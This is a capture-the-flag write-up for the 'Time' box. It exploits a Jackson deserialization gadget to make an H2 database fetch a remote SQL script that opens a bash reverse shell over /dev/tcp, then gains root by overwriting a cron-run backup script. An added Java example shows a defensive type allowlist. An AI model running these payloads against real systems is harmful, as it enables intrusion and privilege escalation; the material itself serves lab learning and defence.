Time

To get into the system we abuse a well-known Java deserialization vulnerability in the Jackson library. The box runs a JSON parser that accepts user input and doesn't validate it properly. Jackson has a built-in blacklist, and since you can only deserialize classes that exist on the application's classpath, finding the right Jackson gadget was pretty time consuming. After some trial and error we finally found a good gadget: ch.qos.logback.core.db.DriverManagerConnectionSource

To exploit this we send the following payload:


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.50:8000/inject.sql'"  } ]
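As an added example (not the box's code and not part of the original writeup), here is the Jackson configuration contrast a defender cares about: the legacy enableDefaultTyping() that lets JSON name any class on the classpath, beside a Jackson 2.10+ PolymorphicTypeValidator allowlist that refuses the gadget above before it is instantiated. The model package com.example.model and the ATTACKER_HOST placeholder are assumptions.

```java
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class DefaultTypingHardening {

    // Constructed sample in the same shape as the writeup's payload;
    // ATTACKER_HOST is a placeholder, not a real address.
    static final String PAYLOAD =
        "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\","
      + " {\"url\":\"jdbc:h2:mem:;INIT=RUNSCRIPT FROM 'http://ATTACKER_HOST/inject.sql'\"}]";

    // Weak setting: legacy default typing lets the JSON pick any class on the
    // classpath, which is what makes the logback gadget reachable. Shown for
    // contrast only; it is never used to read PAYLOAD here.
    static ObjectMapper vulnerableMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping(); // deprecated since 2.10, no type allowlist
        return m;
    }

    // Corrected setting (Jackson 2.10+): default typing is only activated with a
    // PolymorphicTypeValidator that allowlists the application's own model
    // package ("com.example.model" is an assumed name).
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfSubType("com.example.model.")
            .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return m;
    }

    // Returns true when the hardened mapper refuses to resolve the gadget class.
    static boolean hardenedMapperRejects(String json) {
        try {
            hardenedMapper().readValue(json, Object.class);
            return false;
        } catch (JsonProcessingException e) {
            // The validator raises InvalidTypeIdException before any class is instantiated.
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println("hardened mapper rejects gadget: " + hardenedMapperRejects(PAYLOAD));
    }
}
```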

This payload makes the embedded H2 database fetch and run a remote SQL script, into which we inject a system call that gives us a reverse shell on port 1337. The file inject.sql contains:


-- Define a SQL alias backed by Java code that runs a shell command and returns its output
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : ""; }
$$;
-- Invoke the alias to spawn the reverse shell
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.50/1337 0>&1');

After getting in and enumerating a little, we found that a script is executed on the server by root roughly every 10 seconds. The script is /usr/bin/timer_backup.sh and is owned by the user we have a shell as, so we can simply edit the file and root will execute whatever it contains. The easiest way to get the flag is to run the following command:


echo 'cat /root/root.txt > /home/pericles/root.txt' > /usr/bin/timer_backup.sh